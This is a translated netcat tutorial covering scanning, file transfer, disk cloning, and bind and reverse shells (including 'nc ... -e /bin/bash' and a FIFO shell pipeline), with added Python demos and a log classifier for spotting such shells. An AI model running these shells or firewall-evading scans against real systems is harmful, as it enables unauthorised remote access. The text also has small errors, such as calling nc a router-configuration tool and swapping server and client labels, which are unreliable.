Linux Netcat Commands - The Swiss Army Knife of Network Tools

netcat is the Swiss Army knife of networking tools: it can read and write data over the network via TCP and UDP. By combining it with other tools and shell redirection, you can use it in a great many ways in your scripts. It is amazing what can be done with the netcat command.

What netcat does is establish a connection between two computers and give you two data streams; what you do with them is up to your imagination. You can build a server, transfer files, chat with friends, stream media or use it as a standalone client for other protocols.

Below are some examples of using netcat. Two machines are used throughout: A (172.31.100.7) and B (172.31.100.23).

Linux netcat command examples:

1. Port scan

Port scanning is often used by system administrators and attackers alike to discover open ports on a machine and help identify weaknesses in its services.

$ nc -z -v -n 172.31.100.7 21-25

netcat can run in TCP or UDP mode; TCP is the default, and the -u option switches to UDP.

The -z option tells netcat to use zero I/O: close the connection as soon as it has been established and exchange no data (thanks to @jxing for the pointer).

The -v option enables verbose output.

The -n option tells netcat not to do a reverse DNS lookup on the IP address.

This command reports which of the ports 21 to 25 are open. A banner is a text message sent to you by the service you have just connected to. Banner information is very useful when you are trying to identify the type and version of a service, or its vulnerabilities. However, not all services send banners.

Once you have found open ports, you can grab their banners by connecting to the service with netcat.

$ nc -v 172.31.100.7 21

This connects to port 21 and prints the banner of the service running on it.
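As an added illustration that is not part of the original article, the Python script below reproduces what the two commands above do at the socket level and, more usefully for a defender, records what the service on the other end sees. zero_io_probe behaves like nc -z (connect, then close without sending anything) and grab_banner like nc -v followed by reading the banner and typing QUIT. The listener, its FTP-style banner and the port numbers are fixtures constructed inside the script; the point is that a -z sweep shows up in a service's own logs as accepted connections that carry zero bytes of client data.

```python
import socket
import threading
import time

# Constructed sample banner; real services send their own text, or none at all.
SAMPLE_BANNER = b"220 demo.example FTP server ready\r\n"


class BannerService:
    """Minimal TCP service on 127.0.0.1: sends a banner, then records how many
    bytes each client sent before hanging up (what a server-side log would show)."""

    def __init__(self, banner=SAMPLE_BANNER):
        self.banner = banner
        self.connections = []  # one (client_port, bytes_received) entry per client
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, peer = self.sock.accept()
            except OSError:
                return  # listening socket was closed
            with conn:
                received = b""
                try:
                    conn.sendall(self.banner)
                    conn.settimeout(0.5)
                    received = conn.recv(4096)
                except OSError:
                    pass  # peer reset the connection or timed out: nothing received
                self.connections.append((peer[1], len(received)))

    def wait_for(self, count, timeout=2.0):
        """Block until `count` clients have been logged (the handler runs in a thread)."""
        deadline = time.monotonic() + timeout
        while len(self.connections) < count and time.monotonic() < deadline:
            time.sleep(0.01)
        return len(self.connections)

    def close(self):
        self.sock.close()


def zero_io_probe(host, port, timeout=1.0):
    """Like `nc -z host port`: True if a TCP connection succeeds; nothing is sent."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def grab_banner(host, port, timeout=1.0):
    """Like `nc -v host port`: connect, read what the service volunteers, then
    say goodbye the way an interactive user would (here: an FTP-style QUIT)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            banner = s.recv(4096).decode(errors="replace").strip()
        except socket.timeout:
            banner = ""  # not every service sends a banner
        s.sendall(b"QUIT\r\n")
    return banner


def free_closed_port():
    """Reserve and release an ephemeral port so that probing it is refused (constructed case)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def run_demo():
    svc = BannerService()
    try:
        result = {
            "open_port_probe": zero_io_probe("127.0.0.1", svc.port),
            "closed_port_probe": zero_io_probe("127.0.0.1", free_closed_port()),
            "banner": grab_banner("127.0.0.1", svc.port),
        }
        svc.wait_for(2)
        # Server-side view: the probe left a 0-byte connection, the banner grab sent 6 bytes (QUIT).
        result["bytes_per_connection"] = [n for _, n in svc.connections]
    finally:
        svc.close()
    return result


if __name__ == "__main__":
    print(run_demo())
```

The zero-byte entries are what to look for when reviewing service logs for scanning activity; an interactive client normally sends at least one request before disconnecting.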

 

2. Chat server

If you want to chat with your friends, there is plenty of software and many services to choose from. But suppose you do not have that luxury, for example you are in a computer lab where all external connections are restricted: how do you talk to a friend sitting in the next room all day? Don't despair, netcat offers a way. You only need to create a chat server on an agreed port, and your friend can connect to you.

Server

$ nc -l 1567

This starts a TCP server on port 1567. Whatever is typed on standard input is sent to the connection, and whatever arrives is printed on standard output, so both sides of the conversation appear in this shell.

Client

$ nc 172.31.100.7 1567

Whatever you type on machine B will appear on machine A.

 

3. File transfer

Much of the time we need to move files across the network with one tool or another. There are many ways to do it, such as FTP, SCP or SMB, but when you only need to transfer a file once or temporarily, it is hardly worth the time to install and configure extra software. Suppose you want to send a file file.txt from A to B. Either A or B can act as the server or the client; below, A is the server and B is the client.

Server

$ nc -l 1567 < file.txt

Client

$ nc -n 172.31.100.7 1567 > file.txt

Here we create a server on A and redirect netcat's input from file.txt, so that whenever a connection to this port succeeds, netcat sends the file's contents. On the client side we redirect netcat's output to file.txt: when B connects to A, A sends the file's contents and B saves them to file.txt.

The source of the file does not have to be the server; we can also do it the other way round. Below we send a file from B to A with the server created on A; this time we only need to redirect netcat's output on the server and netcat's input on B.

B as server

Server

$ nc -l 1567 > file.txt

Client

$ nc 172.31.100.23 1567 < file.txt
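One check a practitioner wants after any of these transfers: netcat moves a byte stream and stops at end-of-file, so the receiving side cannot tell a complete file from one cut short by a dropped connection, and nothing on the wire authenticates the sender. The usual remedy is to run sha256sum on both ends and compare the values over a separate channel. The Python script below is an added example written for this page, not code from the original article: it plays both sides of the transfer over loopback (serve_file stands in for `nc -l 1567 < file.txt`, fetch_file for `nc -n host 1567 > file.txt`), simulates a link dropping mid-transfer with truncate_at, and shows that only the digest comparison catches it. The file contents are constructed.

```python
import hashlib
import socket
import threading

# Constructed stand-in for file.txt (about 11 KB of text lines).
SAMPLE_FILE = b"".join(
    f"line {i:04d}: netcat moves bytes, it does not know about files\n".encode()
    for i in range(200)
)


def sha256_hex(data):
    """Same digest `sha256sum` prints; run it on both ends and compare the values."""
    return hashlib.sha256(data).hexdigest()


def serve_file(data, truncate_at=None):
    """Play the role of `nc -l <port> < file.txt` on 127.0.0.1: send the data to the
    first client and close. truncate_at simulates the link dropping mid-transfer."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    payload = data if truncate_at is None else data[:truncate_at]

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(payload)  # closing after sendall looks like a normal EOF to the peer
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def fetch_file(host, port):
    """Play the role of `nc -n <host> <port> > file.txt`: read until the peer closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        while True:
            chunk = s.recv(65536)
            if not chunk:  # EOF: netcat would exit here whether or not the file is complete
                break
            chunks.append(chunk)
    return b"".join(chunks)


def transfer_and_verify(data, truncate_at=None):
    """Transfer over loopback and report whether the out-of-band digest matches."""
    expected = sha256_hex(data)  # computed on the sender; communicated over a separate channel
    port = serve_file(data, truncate_at)
    received = fetch_file("127.0.0.1", port)
    return {
        "bytes_received": len(received),
        "digest_matches": sha256_hex(received) == expected,
    }


if __name__ == "__main__":
    print("complete :", transfer_and_verify(SAMPLE_FILE))
    print("truncated:", transfer_and_verify(SAMPLE_FILE, truncate_at=1000))
```

The truncated run still ends "successfully" from netcat's point of view (the receiver simply sees EOF after 1000 bytes); only the digest comparison reveals that the file is incomplete.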

 

4. Directory transfer

Sending one file is easy, and sending several files or a whole directory is just as easy: use tar to pack them into an archive and send the archive.

If you want to transfer a directory from A to B over the network:

Server

$ tar -cvf - dir_name | nc -l 1567

Client

$ nc -n 172.31.100.7 1567 | tar -xvf -

Here on the server A we create a tar archive and write it to standard output with -, then pipe it into netcat, which sends it over the network.

On the client side we receive the tarball through the netcat pipe and extract it.

If we want to save bandwidth, we can compress the archive with bzip2 or another tool before sending it.

Server

$ tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress with bzip2.

Client

$ nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompress with bzip2.

 

5. Encrypt the data you send over the network

If you are concerned about the confidentiality of the data you send over the network, you can encrypt it with a tool such as mcrypt before sending it.

Server

$ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Receive the data and decrypt it with mcrypt (-d selects decryption).

Client

$ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Encrypt the file with mcrypt and send it. Both commands prompt for a passphrase; make sure both ends use the same one.

Here we use mcrypt for encryption, but any other encryption tool can be used.
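The commands above run mcrypt in ECB mode (-m ecb). As an added note that is not part of the original article: ECB encrypts every 16-byte block independently, so identical plaintext blocks produce identical ciphertext blocks and the structure of the file shows through the encryption. The Python example below, written for this page, demonstrates that with a toy 4-round Feistel cipher (constructed here purely for illustration; it is not AES and not what mcrypt implements) and compares ECB with CBC under a random IV. The key and plaintext are constructed values. Neither mode authenticates the data, so for a real transfer a practitioner would use an authenticated mode such as AES-GCM, or simply carry the transfer over SSH or TLS.

```python
import hashlib
import os

BLOCK = 16  # bytes per block; the toy cipher below works on two 8-byte halves


def _f(key, rnd, half):
    """Keyed round function (SHA-256 truncated to 8 bytes); toy, not a real cipher."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """4-round Feistel network: a bijection on 16-byte blocks, i.e. a toy block cipher."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def pad(data):  # PKCS#7 padding to a whole number of blocks
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    return data[: -data[-1]]


def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, plaintext):
    """Each block encrypted on its own: equal plaintext blocks give equal ciphertext blocks."""
    return b"".join(block_encrypt(key, b) for b in _blocks(pad(plaintext)))


def ecb_decrypt(key, ciphertext):
    return unpad(b"".join(block_decrypt(key, b) for b in _blocks(ciphertext)))


def cbc_encrypt(key, plaintext, iv=None):
    """Each block is XORed with the previous ciphertext block (or a random IV) before encryption."""
    iv = os.urandom(BLOCK) if iv is None else iv
    out, prev = [], iv
    for b in _blocks(pad(plaintext)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return iv, b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for c in _blocks(ciphertext):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return unpad(b"".join(out))


def distinct_blocks(ciphertext):
    """How many different 16-byte blocks the ciphertext contains (a pattern-leak indicator)."""
    return len(set(_blocks(ciphertext)))


# Constructed demo inputs: a key and a "file" whose records repeat, like a table dump.
DEMO_KEY = b"constructed-key!"
DEMO_FILE = b"same 16-byte blk" * 6 + b"different block!" * 2


def compare_modes(key=DEMO_KEY, plaintext=DEMO_FILE):
    """Encrypt the same plaintext under ECB and CBC and count distinct ciphertext blocks."""
    ecb_ct = ecb_encrypt(key, plaintext)
    iv, cbc_ct = cbc_encrypt(key, plaintext)
    assert ecb_decrypt(key, ecb_ct) == plaintext
    assert cbc_decrypt(key, iv, cbc_ct) == plaintext
    return {
        "blocks": len(ecb_ct) // BLOCK,           # 8 data blocks + 1 padding block
        "ecb_distinct": distinct_blocks(ecb_ct),  # 3: the two record types and the padding block
        "cbc_distinct": distinct_blocks(cbc_ct),  # 9: every block differs (collisions are negligible)
    }


if __name__ == "__main__":
    print(compare_modes())
```

Under ECB an observer who cannot decrypt anything still learns which records of the file are identical and where they sit; CBC with a fresh random IV removes that leak, but still offers no integrity check.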

 

6. Streaming video

This is not the best way to stream video, but if no dedicated tool is available on the server, netcat still offers a way.

Server

$ cat video.avi | nc -l 1567

Here we simply read the video file and feed it to netcat, which serves it to the client.

Client

$ nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read the data from the socket and pipe it into mplayer.

 

7. Clone a device

If you have installed and configured one Linux machine and need to do the same on other machines, you will not want to repeat the whole configuration. Instead of repeating the installation, boot the other machine from a live pen drive and clone your machine onto it.

Cloning a Linux PC is easy, assuming your system is on the disk /dev/sda.

Server

$ dd if=/dev/sda | nc -l 1567

Client

$ nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd reads raw data from the disk; we redirect its output stream through the netcat server to the other machine, which writes it to its own disk. This copies everything, including the partition table. If the partitioning is already done and only the root partition needs to be cloned, replace sda with sda1, sda2 and so on, depending on where the system root partition lives.

 

8. Open a shell

We have used remote shells with telnet and ssh, but if neither is installed and we have no permission to install them, netcat can also provide a remote shell.

Assuming your netcat supports the -c and -e options (the default netcat does):

Server

$ nc -l 1567 -e /bin/bash -i

Client

$ nc 172.31.100.7 1567

Here we create a netcat server and tell it to execute /bin/bash once a connection is accepted.

If netcat does not support the -c or -e options (the OpenBSD netcat), we can still create a remote shell:

Server

$ mkfifo /tmp/tmp_fifo
$ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we create a FIFO and pipe its contents into the shell; 2>&1 merges standard error into standard output, which is then piped into netcat listening on port 1567. Finally, netcat's output is redirected back into the FIFO.

Explanation:

  •     Input received from the network is written to the FIFO.
  •     cat reads the FIFO and feeds its contents to sh.
  •     sh executes the input and writes the result to netcat.
  •     netcat sends that output to the client over the network.

This works because the pipe runs the commands in parallel. A FIFO is used instead of a regular file because reading a FIFO blocks until data arrives; with a regular file, cat would hit end-of-file straight away and exit.

On the client side, simply connect to the server:

Client

$ nc -n 172.31.100.7 1567

You will get a shell prompt on the client side.

 

9. Reverse shell

A reverse shell is a shell opened on the client side. It is so named because, unlike the usual arrangement, here the server uses a service provided by the client.

Server

$ nc -l 1567

On the client side, simply tell netcat to execute a shell once the connection is established.

Client

$ nc 172.31.100.7 1567 -e /bin/bash

Now, what is special about a reverse shell?

Reverse shells are often used to get around firewall restrictions such as blocked inbound connections. For example, suppose I have the private IP address 172.31.100.7 and reach the outside network through a proxy server. If I want to reach this machine's shell from an outside host such as 1.2.3.4, I would use a reverse shell for that purpose.
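From the defender's side, the bind-shell and reverse-shell invocations in sections 8 and 9, including the FIFO variant, are easy to recognise in process-execution logs, and so is the -z scan from section 1. The following Python script is an added example written for this page, not something from the original article: it classifies the command lines found in a constructed log into port scans, bind shells, reverse shells and shell-through-FIFO pipelines. The log format, host and user names are made up, and the binary names in NETCAT_NAMES and SHELL_NAMES are assumptions. It is a heuristic for review and alerting, not a complete detector.

```python
import os
import re
import shlex

# Assumed binary names: programs that behave as netcat, and shells worth noting
# when one is chained with netcat in a pipeline.
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash"}

# Constructed process-execution log in a made-up format: timestamp, host, user, cmd="...".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=B user=alice cmd="nc -z -v -n 172.31.100.7 21-25"
2024-05-01T10:01:12Z host=A user=alice cmd="nc -l 1567 < file.txt"
2024-05-01T10:02:30Z host=A user=bob cmd="tar -cvf - dir_name | nc -l 1567"
2024-05-01T10:03:45Z host=A user=bob cmd="nc -l 1567 -e /bin/bash -i"
2024-05-01T10:04:02Z host=B user=bob cmd="nc 172.31.100.7 1567 -e /bin/bash"
2024-05-01T10:05:19Z host=A user=bob cmd="cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo"
"""

CMD_RE = re.compile(r'cmd="(?P<cmd>.*)"$')


def _short_flags(argv):
    """Single-dash option words such as -l, -e or the combined -vln (not '-' alone)."""
    return [a for a in argv[1:] if a.startswith("-") and not a.startswith("--") and len(a) > 1]


def classify_command(cmd):
    """Return a category for one shell command line, or None if nothing stands out."""
    stages = [shlex.split(part) for part in cmd.split("|")]
    saw_netcat = saw_shell = False
    for argv in stages:
        if not argv:
            continue
        name = os.path.basename(argv[0])
        if name in NETCAT_NAMES:
            saw_netcat = True
            flags = _short_flags(argv)
            listening = any("l" in f[1:] for f in flags)
            # -e / -c hand the connection to a program; --exec / --sh-exec are ncat's spellings.
            executes = any("e" in f[1:] or "c" in f[1:] for f in flags) or any(
                a.startswith(("--exec", "--sh-exec")) for a in argv[1:]
            )
            if executes:
                return "bind_shell" if listening else "reverse_shell"
            if any("z" in f[1:] for f in flags):
                return "port_scan"
        elif name in SHELL_NAMES:
            saw_shell = True
    # No -e needed: a shell whose output is piped into netcat (the FIFO recipe above).
    if saw_netcat and saw_shell:
        return "fifo_shell_pipeline"
    return None


def scan_log(text):
    """Run the classifier over log lines; returns (category, command) for each hit."""
    hits = []
    for line in text.splitlines():
        m = CMD_RE.search(line)
        if not m:
            continue
        category = classify_command(m.group("cmd"))
        if category:
            hits.append((category, m.group("cmd")))
    return hits


if __name__ == "__main__":
    for category, cmd in scan_log(SAMPLE_LOG):
        print(f"{category:20} {cmd}")
```

The plain file and directory transfers in the sample log are not flagged: listening with -l alone is normal netcat use, and what distinguishes the shell cases is either an exec option or a shell feeding its output into netcat.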

 

10. Specify the source port

Suppose your firewall filters all ports except port 25; then you need to specify the source port with the -p option.

Server

$ nc -l 1567

Client

$ nc 172.31.100.7 1567 -p 25

Using a port below 1024 requires root privileges.

This command makes the client use port 25 for the connection; otherwise a random port would be used.

 

11. Specify the source address

Suppose your machine has several addresses and you want to state explicitly which one to use for outgoing traffic. We can specify the IP address with netcat's -s option.

Server

$ nc -u -l 1567 < file.txt

Client

$ nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

This command binds to the address 172.31.100.5.

These are just some examples of using netcat.

Other uses include:

  •     Using the -t option to simulate a Telnet client,
  •     An HTTP client for downloading files,
  •     Connecting to a mail server and checking mail with the SMTP protocol,
  •     Using ffmpeg to take screenshots and share them as a stream, and more.

Simply put, as long as you understand the protocol, you can use netcat as the network transport to implement all kinds of clients.

 

Reference documentation

Netcat Manual

 

English original: Linux Netcat command – The swiss army knife of networking

 

The nc command is the abbreviation of the netcat command, which is used to configure the router.

 

Syntax

nc/netcat [options] [parameters]

Options

-g <gateway>: set a source-routing hop (gateway); up to 8 may be given;

-G <pointer>: set the source-routing pointer, whose value is a multiple of 4;

-h: online help;

-i <seconds>: set the delay interval when sending data and when scanning ports;

-l: listen mode, for incoming connections;

-n: use IP addresses directly, without consulting DNS;

-o <file>: dump the transmitted data into this file as a hex dump;

-p <port>: set the local port to use;

-r: choose the source and destination ports at random;

-s <address>: set the source IP address of the packets sent by the local host;

-u: use UDP instead of TCP;

-v: verbose; show what the command is doing;

-w <seconds>: set the time to wait for a connection;

-z: zero-I/O mode, used only for port scanning.

Parameters

Host: the IP address or host name of the remote host;

Port: a single integer or a range.

 

 

Original: http://www.oschina.net/translate/linux-netcat-command

From: Linux Netcat Command - The Swiss Army Knife of Network Tools

 

 

 

 
